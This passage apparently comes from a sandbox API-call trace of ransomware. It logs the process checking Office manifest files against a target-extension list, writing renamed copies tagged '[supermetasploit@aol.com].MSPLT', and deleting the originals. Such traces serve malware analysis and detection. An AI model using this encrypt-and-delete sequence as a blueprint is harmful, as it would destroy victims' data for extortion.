lpNumberOfBytesWritten=0x2aefc94*=0x4f0, lpOverlapped=0x0) returned 1 [0183.465] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0183.465] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0183.465] SetEndOfFile (hFile=0x378) returned 1 [0183.465] CloseHandle (hObject=0x378) returned 1 [0183.468] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0183.468] SetEndOfFile (hFile=0x384) returned 1 [0183.469] CloseHandle (hObject=0x384) returned 1 [0183.470] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0183.470] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml")) returned 1 [0183.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0183.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0183.471] lstrlenW (lpString=".doc") returned 4 [0183.471] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.471] lstrlenW (lpString=".docx") returned 5 [0183.471] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.471] lstrlenW (lpString=".pdf") returned 4 [0183.471] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.471] lstrlenW (lpString=".xls") returned 4 [0183.471] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.471] lstrlenW (lpString=".xlsx") returned 5 [0183.471] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.471] lstrlenW (lpString=".ppt") returned 4 [0183.471] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0183.471] lstrlenW (lpString=".zip") returned 4 [0183.471] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.471] lstrlenW (lpString=".rar") returned 4 [0183.471] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.472] lstrlenW (lpString=".bz2") returned 4 [0183.472] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.472] lstrlenW (lpString=".7z") returned 3 [0183.472] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0183.472] lstrlenW (lpString=".dbf") returned 4 [0183.472] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0183.472] lstrlenW (lpString=".1cd") returned 4 [0183.472] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0183.472] lstrlenW (lpString=".jpg") returned 4 [0183.472] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0183.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0183.472] lstrlenW (lpString=".doc") returned 4 [0183.472] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.472] lstrlenW (lpString=".docx") returned 5 [0183.472] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.472] lstrlenW (lpString=".pdf") returned 4 [0183.472] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.472] lstrlenW (lpString=".xls") returned 4 [0183.472] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.472] lstrlenW (lpString=".xlsx") returned 5 [0183.472] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.472] lstrlenW (lpString=".ppt") returned 4 [0183.473] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0183.473] lstrlenW (lpString=".zip") returned 4 [0183.473] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.473] lstrlenW (lpString=".rar") returned 4 [0183.473] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.473] lstrlenW (lpString=".bz2") returned 4 [0183.473] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.473] lstrlenW (lpString=".7z") returned 3 [0183.473] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0183.473] lstrlenW (lpString=".dbf") returned 4 [0183.473] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0183.473] lstrlenW (lpString=".1cd") returned 4 [0183.473] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 104 [0183.473] lstrlenW (lpString=".jpg") returned 4 [0183.473] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.473] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0183.473] lstrlenW (lpString="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 53 [0183.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0183.474] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=3754) returned 1 [0183.474] CloseHandle (hObject=0x384) returned 1 [0183.475] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml")) returned 0x220 [0183.475] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0183.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0183.475] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0183.475] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0183.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0183.476] GetLastError () returned 0x0 [0183.476] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0xeaa, lpOverlapped=0x0) returned 1 [0183.478] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xeb0, lpOverlapped=0x0) returned 1 [0183.479] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0183.479] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0183.479] SetEndOfFile (hFile=0x378) returned 1 [0183.479] CloseHandle (hObject=0x378) returned 1 [0183.484] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0183.484] SetEndOfFile (hFile=0x384) returned 1 [0183.485] CloseHandle (hObject=0x384) returned 1 [0183.485] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0183.486] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml")) returned 1 [0183.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0183.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0183.486] lstrlenW (lpString=".doc") returned 4 [0183.486] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.486] lstrlenW (lpString=".docx") returned 5 [0183.487] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.487] lstrlenW (lpString=".pdf") returned 4 [0183.487] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.487] lstrlenW (lpString=".xls") returned 4 [0183.487] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.487] lstrlenW (lpString=".xlsx") returned 5 [0183.487] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.487] lstrlenW (lpString=".ppt") returned 4 [0183.487] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0183.487] lstrlenW (lpString=".zip") returned 4 [0183.487] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.487] lstrlenW (lpString=".rar") returned 4 [0183.487] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.487] lstrlenW (lpString=".bz2") returned 4 [0183.487] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.487] lstrlenW (lpString=".7z") returned 3 [0183.487] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0183.487] lstrlenW (lpString=".dbf") returned 4 [0183.487] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0183.487] lstrlenW (lpString=".1cd") returned 4 [0183.487] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0183.487] lstrlenW (lpString=".jpg") returned 4 [0183.487] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0183.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0183.488] lstrlenW (lpString=".doc") returned 4 [0183.488] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.488] lstrlenW (lpString=".docx") returned 5 [0183.488] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.488] lstrlenW (lpString=".pdf") returned 4 [0183.488] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.488] lstrlenW (lpString=".xls") returned 4 [0183.488] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.488] lstrlenW (lpString=".xlsx") returned 5 [0183.488] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.488] lstrlenW (lpString=".ppt") returned 4 [0183.488] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0183.488] lstrlenW (lpString=".zip") returned 4 [0183.488] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.488] lstrlenW (lpString=".rar") returned 4 [0183.488] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.488] lstrlenW (lpString=".bz2") returned 4 [0183.488] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.488] lstrlenW (lpString=".7z") returned 3 [0183.488] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0183.488] lstrlenW (lpString=".dbf") returned 4 [0183.488] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0183.488] lstrlenW (lpString=".1cd") returned 4 [0183.489] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0183.489] lstrlenW (lpString=".jpg") returned 4 [0183.489] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.489] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0183.489] lstrlenW (lpString="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 53 [0183.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0183.489] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=1261) returned 1 [0183.490] CloseHandle (hObject=0x384) returned 1 [0183.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml")) returned 0x220 [0183.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0183.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0183.490] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0183.490] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0183.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0183.491] GetLastError () returned 0x0 [0183.491] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x4ed, lpOverlapped=0x0) returned 1 [0183.928] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x4f0, lpOverlapped=0x0) returned 1 [0183.930] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0183.931] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0183.931] SetEndOfFile (hFile=0x378) returned 1 [0183.931] CloseHandle (hObject=0x378) returned 1 [0183.936] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0183.936] SetEndOfFile (hFile=0x384) returned 1 [0183.942] CloseHandle (hObject=0x384) returned 1 [0183.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0183.943] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml")) returned 1 [0183.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0183.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0183.944] lstrlenW (lpString=".doc") returned 4 [0183.944] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.944] lstrlenW (lpString=".docx") returned 5 [0183.944] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.944] lstrlenW (lpString=".pdf") returned 4 [0183.944] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.944] lstrlenW (lpString=".xls") returned 4 [0183.944] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.944] lstrlenW (lpString=".xlsx") returned 5 [0183.944] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.944] lstrlenW (lpString=".ppt") returned 4 [0183.944] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0183.944] lstrlenW (lpString=".zip") returned 4 [0183.944] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.944] lstrlenW (lpString=".rar") returned 4 [0183.944] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.944] lstrlenW (lpString=".bz2") returned 4 [0183.945] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.945] lstrlenW (lpString=".7z") returned 3 [0183.945] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0183.945] lstrlenW (lpString=".dbf") returned 4 [0183.945] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0183.945] lstrlenW (lpString=".1cd") returned 4 [0183.945] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0183.945] lstrlenW (lpString=".jpg") returned 4 [0183.945] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0183.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0183.945] lstrlenW (lpString=".doc") returned 4 [0183.945] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.945] lstrlenW (lpString=".docx") returned 5 [0183.945] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.945] lstrlenW (lpString=".pdf") returned 4 [0183.945] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.945] lstrlenW (lpString=".xls") returned 4 [0183.945] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.945] lstrlenW (lpString=".xlsx") returned 5 [0183.945] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.945] lstrlenW (lpString=".ppt") returned 4 [0183.945] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0183.945] lstrlenW (lpString=".zip") returned 4 [0183.945] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.945] lstrlenW (lpString=".rar") returned 4 [0183.945] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.945] lstrlenW (lpString=".bz2") returned 4 [0183.945] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.945] lstrlenW (lpString=".7z") returned 3 [0183.946] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0183.946] lstrlenW (lpString=".dbf") returned 4 [0183.946] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0183.946] lstrlenW (lpString=".1cd") returned 4 [0183.946] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 104 [0183.946] lstrlenW (lpString=".jpg") returned 4 [0183.946] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.946] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0183.946] lstrlenW (lpString="AppXManifestLoc.en-us.xml") returned 25 [0183.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0183.947] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=9831) returned 1 [0183.947] CloseHandle (hObject=0x384) returned 1 [0183.947] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml")) returned 0x220 [0183.947] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0183.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0183.947] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: 